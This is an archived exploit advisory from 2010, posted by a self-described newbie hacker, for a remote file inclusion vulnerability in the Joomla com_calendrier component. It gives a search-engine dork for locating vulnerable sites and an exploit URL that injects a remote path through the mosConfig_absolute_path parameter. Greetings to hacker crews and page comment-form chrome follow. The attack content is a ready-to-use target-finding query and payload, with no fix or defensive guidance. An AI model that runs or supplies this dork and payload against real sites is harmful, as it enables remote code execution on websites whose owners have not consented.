The Joomla Calendrier component remote file inclusion vulnerability

2010.10.27

Credit: jos_ali_joe

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: com_calendrier

=========================================================
Joomla  Component com_calendrier RFI Vulnerability
=========================================================

[+]Title        : Joomla  Component com_calendrier RFI Vulnerability
[+]Author       : jos_ali_joe
[+]Contact      : josalijoe@yahoo.com
[+]Home 	: http://josalijoe.wordpress.com/		

######################################################################## 

Dork		: inurl:index.php?option="com_calendrier"

######################################################################## 

[ Software Information ]

########################################################################
[+] Vendor : http://extensions.joomla.org/
[+] Archive : http://extensions.joomla.org/extensions/calendars-a-events
[+] version : Joomla 1.5
[+] Vulnerability : RFI
[+] Dork : com_calendrier
########################################################################

==========================================================================

RFI Exploit 

Exploit		: http://example.com/index.php?option=com_calendrier&Itemid=&mosConfig_absolute_path=[ packetstormsecurity ]

==========================================================================

####################################################################################

a little story from my

before thank you for the admin and staff packetstorm security

who already receive exploit archive from newbie jos_ali_joe

I do not have the kind of teacher or her

My teacher just google

and my brother who has been guiding me. N4ck0 - Aury - TeRRenJr - ArRay

I will create a spirit of looking for bugs / dork and submit the packetstorm security.

Thanks for packetstorm security \m/

####################################################################################

Thanks :

./kaMtiEz &#65533; ibl13Z &#65533; Xrobot &#65533; tukulesto &#65533; R3m1ck &#65533; jundab - asickboys- Vyc0d &#65533; Yur4kha - XPanda - eL Farhatz

./ArRay &#65533; akatsuchi &#65533; K4pt3N &#65533; Gameover &#65533; antitos &#65533; yuki &#65533; pokeng &#65533; ffadill - Alecs - v3n0m - RJ45

./Kiddies &#65533; pL4nkt0n &#65533; chaer newbie &#65533; andriecom &#65533; Abu_adam &#65533; Petimati - hakz &#65533; Virgi &#65533; Anharku - a17z a.k.a maho

./Me Family ATeN4 :

./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe 

Greets For :

./Devilzc0de crew &#65533; Kebumen Cyber &#65533; Explore Crew &#65533; Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Wannabe Hacker 

My Team : ./Indonesian Coder

Special Thanks To :

/. Admin and Staff packetstorm security

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The Joomla Calendrier component remote file inclusion vulnerability

Dork: com_calendrier

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.